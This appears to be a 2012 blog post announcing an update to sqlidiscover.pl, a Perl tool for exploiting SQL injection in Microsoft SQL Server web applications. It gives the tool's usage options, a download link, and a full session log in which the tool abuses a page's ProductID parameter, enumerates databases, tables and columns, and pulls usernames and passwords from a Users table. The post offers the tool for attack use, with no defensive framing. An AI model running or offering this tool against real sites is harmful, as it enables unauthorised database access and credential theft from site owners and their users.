23 Eylül 2012 Pazar

MsSQL SQL Injection Data Crawling - Tool Updated

We've recently updated the functionality of the sqlidiscover.pl tool used for enumerating sql databases, tables, columns and data fields. We've included support for adding a custom cookies to your request.

http://blacksecurity.org/tools/42/sqlidiscover___MsSQL_SQL_Injection_Data_Crawler/124.html



sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
usage: sqlidiscover [-G|-P] [-v] [-b] [-phostname:port] [-cCookieName:CookieValue] [-avarname1=value1,...,varname2=value2] [-ivarname] URL

-G - use GET method
-P - use POST method
-a - additional variables i.e. -aaction=create,cid=12
-b - bypass SQL, OS version and current user check
-i - variable to screw with i.e. -itxtPassword
-v - verbose
URL - http://vuln/file.asp
-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080
-c - use browser cookie, format name:value i.e. -cASPSESSIONID:LCACPKILKFN



Here's an actual example:

jinxy ~ # perl sqlidiscover.pl -c ASPSESSIONIDSSSTRCDB:KCMLJILCJGPBJELANCFHCNGL -v -G -iProductID http://www.example.com/catalog/view.asp
sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
[*] HTTP cookie set to ASPSESSIONIDSSSTRCDB=KCMLJILCJGPBJELANCFHCNGL
[*] URL to process: http://www.example.com/catalog/view.asp
[*] Abusing 'ProductID'...

[+] OS version: Windows NT 5.2 (Build 3790: Service Pack 2)
[+] Current user: dbo


unknown_db.test> help
sqliinjection interactive session help

exit / quit - leave sqli
discover databases / discover dbs - discover all databases on system
discover tables - discover all tables on system
discover columns - discover all columns in current table
select db/database [name] - change context to database [name]
select table [name] - change context to table [name]
fetch n,..,x - fetch data from columns n, etc. (i.e. fetch username,password).

------------------------------------------------------------

unknown_db.test> select database demo
Changing context to demo.test

demo.test> select table Users

Changing context to demo.Users

demo.Users> discover columns

[*] Enumerating columns for table Users
[+] Column search: found: (0) AccountNumber
[+] Column search: found: (1) Address
[+] Column search: found: (2) Email
[+] Column search: found: (3) Name
[+] Column search: found: (4) Password
[+] Column search: found: (5) Phone
[+] Column search: found: (6) Username
[+] Column search finished, 6 found


demo.Users> fetch Username, Password, Name
[+] Using columns Username, Password, Name
[*] Retrieving information for table demo.Users
[+] 3 columns selected for data retrieval
| Username | Password | Name
| admin | demo | Demo
| superadmin | master | Master Admin

Hiç yorum yok:

Yorum Gönder